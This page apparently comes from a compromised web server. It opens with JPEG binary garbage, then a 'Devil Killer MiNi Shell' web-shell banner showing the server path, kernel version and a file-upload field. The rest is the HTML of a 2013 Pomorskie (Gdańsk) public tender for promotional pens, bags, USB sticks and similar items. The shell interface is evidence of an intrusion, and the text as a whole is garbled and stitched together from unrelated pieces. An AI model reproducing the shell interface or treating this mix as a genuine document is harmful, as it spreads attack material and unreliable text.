JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130528/91907-N-2013.html

<p class="kh_header"><b>Gdańsk: WYKONANIE I DOSTARCZENIE ARTYKUŁÓW PROMOCYJNO-REKLAMOWYCH</b><br>
<b>Numer ogłoszenia: 91907 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE I DOSTARCZENIE ARTYKUŁÓW PROMOCYJNO-REKLAMOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. długopis z aluminiowym oksydowanym korpusem;Automatyczny długopis typu Lindo*, tj. z aluminiowym oksydowanym korpusem. Błyszczący srebrny klip i końcówka. Ozdobiony trzema pierścieniami.  Wymiary 14 x 1,0x 1,0 cm, niebieski wkład. Nadruk  1 kolor w 2 miejscach;  3 logotypy oraz adres strony internetowej. 
Kolor długopisu : granat ( 12 000 szt.) ,srebrny ( 5000 szt.) - 17 000 szt. 2.ołówek z gumką;	Ołówek drewniany - zaostrzony z białą gumką i srebrną metalową końcówką mocującą gumkę, grafit HB, wymiary 19 x śred. 0,7 cm Nadruk: tampondruk 1 kolor w dwóch miejscach,  3 logotypy oraz adres strony www
Kolory :  pomarańczowy ( 5000 szt.) , granatowy ( 11 000 szt.), biały ( 500 szt.)-  16 500 szt. 3. zawieszka na szyję - smycz odpinany łącznik, metalowy karabińczyk, uchwyt na tel. podszycie do wewnątrz -  Długość  45 x 5 x 2 cm. Nadruk full kolor dwustronny metodą sublimacyjną. Nadruk trzech logotypów oraz adres strony www.
Kolory  :  pomarańczowy ( 1000 szt.), granatowy ( 6 000 szt.)-7 000 szt.4.torba papierowa 24 x 36 cm Wymiary szer.  24 cm,  wys.36 cm, gł. 9 cm, wykonana z papieru offsetowego, gładkiego  200 g,, uchwyt przewlekany ze sznurkabawełnianego ( dla toreb zielonych preferowany biały sznurek) , usztywniane dno i góra torby, z nadrukowanymi czterema  kolorami, kolory CMYK - 100% zadruku lub Pantone, nadruk dwustronny . Nadruk logotypów  max. w 5 miejscach. Wytrzymałość  do 4  kg . Kolory torby : granat ( 5 000 szt.), zielony ( 1000 szt.) , pomarańczowy ( 1000 szt.) -7 000 szt. 5.twardy Brelok odblaskowy twardy wykonany z odblaskowego plastiku, zakończony łańcuszkiem z  metalowym karabińczykiem. Wymiar : 9 cm. Nadruk 1 kolor, 3-5  logotypów oraz adres strony www. kolor breloka :  pomarańczowy ( 750 szt.), granat ( 2000 szt.), zielony ( 250 szt.),czerwony ( 250 szt.), żółty (250 szt.)- 3 500 szt. 6.kubek termiczny beczułka ;kubek izotermiczny wykonany ze stali  nierdzewnej i plastiku  w kształcie beczułki o pojemności 400 ml, w kolorze ciemnoniebieskim. Wnętrze ze stali nierdzewnej. Pokrywka wykonana z czarnego plastiku. Pakowany indywidualnie w kartonik. Wymiary: 133x110x śred. 90 mm. Nadruk 1 kolor , wzdłuż dolnej krawędzi: 3-5 logotypy oraz napis - 1 620 szt. 7. Metalowy brelok latarka z diodą LED. Zasilany 4 bateryjkami dołączonymi do produktu. Pakowany w czarne kartonowe pudełko wyściełane gąbką. Wymiary produktu  : 50 x10 x 10 mm Nadruk 1 kolor  w  1 miejscu, 3  logotypy -300 szt. 8.zestaw piśmienniczy: długopis + cienkopis + etui elegancki zestaw piśmienniczy zawierający : przekręcany  metalowy długopis  z niebieskim wkładem oraz  metalowy cienkopis z czarnym tuszem i etui wykonane z imitacji skóry. Pakowany indywidualnie w kartonowe nasuwane pudełko. Wymiary 22x17,8x4,5 cm. Nadruk tampondruk  1 kolor w 1 miejscu  na opakowaniu; trzy logotypy. Kolor zestawu : czarny lub brązowy - 455 kompletów 9.pamięć USB 8GB w obudowie drewnianej.Drewniana obrotowa pamięć  8 GB  USB. W dwóch wersjach : z drewna różanego lub klonu. Wymiary 66 x 21 x 13 mm. Rodzaj nadruku : grawer sitodruk. Nadruk 1 kolor, w 2 miejscach 3 logotypów. Kolor obudowy : z drewna klonu (  1 970 szt.), z drewna różanego ( 20 szt.) -1 990 szt.
10.Rękawica kuchenna  bawełniana. Nadruk 1 kolor w 1 miejscu, 3 logotypy Kolor rękawicy : pomarańczowy ( 250 szt.), czerwony ( 200 szt.) -450 szt.11. skakanka żabka.Skakanka z drewnianymi uchwytami w kształcie żabek. Pakowana w woreczek foliowy. Wymiary produktu :  2150 x 47 x 35 mm. Nadruk 1 kolor w 2 miejscach,  3 logotypy -250 szt.12. plastikowa linijka elastyczna ( giętka) o długości 30 cm, szerokości 3 cm w kolorze pomarańczowym. Nadruk full kolor, 3 logotypy w jednym miejscu oraz adres strony www -500 szt.13.torba na zakupy w 80% wykonana z przetworzonych opakowań	Torba na zakupy w 80% wykonana z przetworzonych opakowań PET. Wymiary produktu 41x38 cm. Wstawki i rączki w  kolorze :  pomarańczowym. Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www - 1000 szt.14. automatyczny parasol 23 cale,Automatyczny parasol Mobile typu golf z pokrowcem do noszenia ; metalowa laska i szyny; uchwyt EVA. 8 paneli + etui. Wymiary produktu średnica cm. Nadruk 1 kolor w 1 miejscu ( na jednym brycie), 3 logotypy oraz adres strony www. Kolory : pomarańczowy ( 270 szt.), granatowy ( 400szt) - 670 szt. 15. piłka nożna zrobiona ze skóry syntetycznej, dwie powierzchnie, 32 segmenty, wielkość 5 Nadruk 1 kolor w 1 miejscu, 3 logotypy -300 szt.16.fartuch bawełniany.Naturalnie biały bawełniany fartuch kuchenny, z kolorową lamówką; Wymiar 89X59 cm; Materiał: bawełna; Nadruk 1 kolor w 1 miejscu,3-5 logotypy oraz  hasło i adres strony www;  pakowany  w worek foliowy. Preferowany kolor lamówki dla 1000 szt. : zielony-1200 szt. 17. Zestaw szkolny w drewnianym niebarwionym pudełku. W zestawie : kredki, temperówka, gumka do mazania i linijka. wymiary : 20,7x 3 x 4 cm; Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www.- 6 000 szt.18.notes EKO,Notes z długopisem; Części papierowe pochodzą z recyclingu, Części plastikowe są bio-degradowalne ; Kolorystyka: dwukolorowa beżowo-zielony; Około 60 kartek;  Wymiary notesu: 18x13,7x 1,4 cm, długopis z niebieskim wkładem; Rodzaj nadruku: tampondruk; Nadruk 1 kolor w 2 miejscach, 3-5 logotypów, hasło  oraz adres strony www-1 000 szt.19.zakładka magnetyczna do książki;zakładka magnetyczna prostokątna do książki wykonana w dwóch wzorach; wymiary złożonej zakładki 4 x 11 cm; Zamawiający  dopuszcza  różnice w wymiarach zakładki +- 1cm; wycięcie w tylnej klapce zakładki, umożliwiające takie złożenie zakładki na stronę, że część zakładki wystaje z książki , papier obustronnie kredowany, gramatura 300g, druk offsetowy, full kolor (CMYK), obustronny, powierzchnia uszlachetniona folią błyszczącą, zastosowana para magnesów dzięki którym zakładka trzyma się strony i nie wypada z książki; zakładki pakowane pojedynczo w folię. Nadruk wg  projektu Zamawiającego,  wzór nr 1 : 500szt., wzór nr 2 : 1000 szt.-1 500 szt. 20.notatnik,Notes w oprawie z PET oraz poliestru 600 D w kolorze zielonym, o wymiarach 8,9 x 13,3 x 1,25 cm z zewnętrznym uchwytem na długopis, dwie kieszonki na karty kredytowe , zawierający notes
Nadruk 1 kolor  w 1 miejscu, 3 logotypy oraz adres strony www-400 szt. 21.tablica z klipem A4,Tablica z klipem , format A4,  z tworzywa sztucznego, o wymiarach 22,5 x 31,5 x 0,1 cm w kolorze granatowym lub białym. Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www-300 szt. 22.komplet kredek (12 szt.) w tubie z  temperówką,Zestaw drewnianych kredek w 12 kolorach. Pakowany w kartonową tubę z temperówką. Wymiary produktu : 10,2 x 3,7 x 3,7 cm. Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www-2 500 szt. 23.t-shirt bawełniany dla dzieci,Podkoszulek dziecięcy, 185 g-m2, 100% bawełna ring-spun single jersey, bez szwów bocznych, wzmocnienie na karku ( rozmiary dziecięce: 110 - 164 ) Kolor : granatowy. Nadruk full kolor  w 2 miejscach oraz w 1 kolorze w 1 miejscu [  a) na piersi 1 logo , b) na rękawku 2 loga, 3) na karku hasło w 1 kolorze] 200 szt.
24.Zestaw gier 5 w 1; Zestaw 5 gier w drewnianym pudełku : domino, mikado, szachy, warcaby, Chińczyk. Wymiary  17 x 3 x 17 c m. Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www -200 szt. 25. silikonowy minutnik w kształcie jaja odmierzający czas w zakresie 60 minut. Wymiary 6x8cm; nadruk metodą gwarantującą trwałość w 1 kolorze w 1 miejscu, 3-5 logotypów oraz-ewentualnie  slogan oraz adres strony www; pakowany pojedynczo w kartonik. Kolory minutnika : jasny zielony ( 500 szt.), czerwony ( 250 szt.), niebieski ( 250 szt.)-1 000 szt. 26.przypinka metalowa (dwa wzory), okrągła o wymiarach 56-75 mm, projekty Zleceniodawcy, druk przedniej strony metodą offsetowa, nadruk full kolor CMYK, przednia strona zabezpieczona błyszczącą folią, mocowanie na magnes gwarantujący utrzymanie przypinki w odpowiednim miejscu garderoby bądź powierzchni metalowej.  wzór nr 1 ( 300szt.) wzór nr 2 ( 700 szt.)	1 000 szt.
27.Zestaw do czyszczenia butów złożony z 5 elementów w etui w kolorze brązowym wykonanym z PU. W zestawie : pasta czarna, pasta naturalna, łyżka do butów, szczotka oraz ściereczka wymiary : średnica 7,4 x 17 cm. Nadruk 1 kolor  w 1 miejscu, 3 logotypy oraz adres strony- 200 szt.28.zestaw do gry w boule w futerale zawierającym  : 6 kul, czerwony znacznik ze sznurkiem do mierzenia, małą drewnianą kulkę. Nadruk 1 kolor w 1 miejscu, 3 logotypy oraz adres strony www-200 szt. 29.Balon wraz patyczkiem i koszyczkiem. Nadruk full kolor, w 2 miejscach ( 1 miejsce : 1 logo, 2 miejsce : 2 logotypy) 
Kolory :  pomarańczowy ( 500 szt.) granat ( 5000 szt.), biały ( 500 szt.)-6 000 szt. 30.torba materiałowa z dnem z bawełny lub surówki bawełnianej z nadrukiem full kolor ( CMYK) w  3 miejscach( 1 miejsce : 1 logo, 2 miejsce 2 logotypy, 3 miejsce :  hasło)  wymiary : min. 42 x 38 x 21 cm, długie uszy min. 60 cm . Kolory torby : granatowy ( 2 000 szt.), pomarańczowy ( 1 000 szt.)-3 000 szt.
31.Kubek wykonany z kamionki  w kolorze czarnym na zewnątrz , zielonym lub niebieskim wewnątrz o wymiarach : średnica 10,16 x11,43 cm . Nadruk 1 kolor w 1 miejscu, 3 logotypy-500 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: 
1)	posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają  obowiązek ich posiadania;  
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie dla żadnej z części zamówienia.
Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w pkt  III.4)
W prowadzonym postępowaniu mogą uczestniczyć Wykonawcy, którzy wykazali brak podstaw                         do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1  ustawy Prawo zamówień publicznych.
Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów.
 W prowadzonym postępowaniu mogą uczestniczyć Wykonawcy, którzy wykazali brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1  ustawy Prawo zamówień publicznych.
Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów.
W celu potwierdzenia wykazania spełniania opisanych wyżej warunków udziału w postępowaniu Wykonawca musi załączyć do oferty dokumenty i oświadczenia określone w SIWZ. Zamawiający dokona oceny wykazania spełnienia powyższych warunków na podstawie złożonych przez Wykonawcę, wymaganych w SIWZ dokumentów i oświadczeń na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w pkt III.4)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w pkt III.4)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku na zamówienie nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa  w pkt III.4)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż warunek ten został spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż  100 000,00  złotych (słownie: sto tysięcy złotych)
Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w pkt III.4)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Udział w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika                           do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.  
2)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty,                   o których mowa w niniejszym rozdziale w ust. 2 pkt 1-2.
3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą łącznie Formularz oferty oraz jeden komplet dokumentów, o których mowa w niniejszym rozdziale ust. 1 pkt 1-2.

4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1)	zamiast dokumentów, o których mowa w ust. 2 pkt 2  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2)	dokumenty, o których mowa w pkt 1 lit. a powinny być wystawione nie wcześniej niż  6  miesięcy przed upływem terminu składania ofert;
3)	jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,  nie wydaje się dokumentów, o których mowa w pkt. 1 zastępuje  się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym  organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt. 2 stosuje się odpowiednio.

5. Dokumenty sporządzone  w języku obcym są składane  wraz   z tłumaczeniem na język polski. 

6. Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy                     i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go i nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania    z nich przy wykonaniu zamówienia. 

7.  Brak jakiegokolwiek z dokumentów wymaganych w SIWZ lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania oraz uznanie jego oferty za odrzuconą,                                      z zastrzeżeniem ust. 8 niniejszego rozdziału.

8. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału                                   w postępowaniu lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia   i dokumenty, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia  w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.

9. Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

10.	W celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 2 pkt 5 ustawy,  należy wraz 
z ofertą złożyć listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) albo informację o tym, że nie należy do grupy kapitałowej - załącznik nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Wszelkie zmiany umowy wymagają formy pisemnej, pod rygorem nieważności.
7.	Istotne zmiany postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru  Wykonawcy mogą dotyczyć:
1)	zmiany warunków i terminów płatności, 
2)	zmiana parametrów technicznych przedmiotu umowy, jeśli przyczyni się to do poprawy jakości zamówienia, przy czym, zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia.
8.	Zmiany, o których mowa w ust. 7 mogą nastąpić jedynie w przypadku:
1)	w zakresie ust. 7 pkt 1, 2 wystąpienia siły wyższej. Pod pojęciem siły wyższej strony rozumieją zdarzenia spowodowane przez czynniki o charakterze zewnętrznym, niemożliwe do przewidzenia w chwili zawarcia umowy i któremu przy dochowaniu należytej staranności nie można było skutecznie zapobiec lub przeciwstawić,
2)	w zakresie ust. 7 pkt 1, 2 gdy zmiany te są korzystne dla Zamawiającego
3)	w zakresie ust. 7 pkt 1 w przypadku zmian powszechnie obowiązujących przepisów w trakcie realizacji umowy, z wyłączeniem zmian przepisów dotyczących wysokości podatku VAT.
9.	Wykonawca wnioskujący o zmianę Umowy, przedłoży Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
